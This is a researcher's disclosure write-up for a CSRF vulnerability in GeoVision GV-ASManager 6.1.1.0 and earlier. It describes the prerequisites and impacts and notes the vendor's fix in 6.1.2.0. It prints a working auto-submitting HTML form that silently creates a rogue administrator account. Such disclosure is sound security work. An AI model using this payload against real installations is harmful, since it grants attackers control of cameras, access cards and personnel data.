CVE-2024-56901 - A Cross-Site Request Forgery (CSRF) vulnerability in Geovision GV-ASManager web application with the version 6.1.1.0 or less that allows attackers to arbitrarily create Admin accounts via a crafted GET request method. This vulnerability is used in chain with CVE-2024-56903 for a successful CSRF attack.
To perform successful attack an attacker requires:
- GeoVision ASManager version 6.1.1.0 or less
- Network access to the GV-ASManager web application (there are cases when there are public access)
- Administrator's interaction with an open session in the browser
The vulnerability can be leveraged to perform the following unauthorized actions:
- A unauthorized account is able to:
- Modify POST method request with GET by leveraging CVE-2024-56903 vulnerability.
- Craft a malicious HTML page which makes changes in the application on behalf of the administrator account.
- Create a new administrator account on behalf of the legit administrator account.
- After the successful attack, an attacker will be able to:
- Access the resources such as monitoring cameras, access cards, parking cars, employees and visitors, etc.
- Make changes in data and service network configurations such as employees, access card security information, IP addresses and configurations, etc.
- Disrupt and disconnect services such as monitoring cameras, access controls.
- Clone and duplicate access control data for further attack scenarios.
- Perform CVE-2024-56902 attack to retrieve cleartext password that can be reused in other digital assets of the organization.
Accounts list before we start attack
By default the creation of a new accoun is done with POST request, we need to change the request method with GET
Changing the POST request method with GET
Generation of the CSRF attack code to create a new administrator - Malicious
Crafting HTML page, which, if triggered by administrator with open session, will create a new administrator account - Malicious
<html>
<body>
<form action="https://192.168.50.129/ASWeb/bin/ASWebCommon.srf">
<input type="hidden" name="action" value="UA_SetCreateAccount" />
<input type="hidden" name="id" value="Malicious" />
<input type="hidden" name="password" value="Youarecracked999!" />
<input type="hidden" name="email" value="Malicious@geovision.com.tw" />
<input type="hidden" name="level" value="2" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
While the administrator is logged in the web application, he, by triggering the CSRF code, automatically creates the new Malicious administrator.
The Malicious administrator account has been created.
The Malicious administrator account logs in with full of privileges.
It is worth noting that, by this attack, Malicious user gains administrative privileges in the following applications:
ASWeb - Access & Security Management
TAWeb - Time and Attendance Management
VMWeb - Visitor Management
ASManager - Access & Security Management software in OS
The vendor of the product GeoVision is informed and they already released the newest fixed version 6.1.2.0 (as of January 2025)
Download the latest version from here
If you have a question, you can contact me, Giorgi Dograshvili on LinkedIn.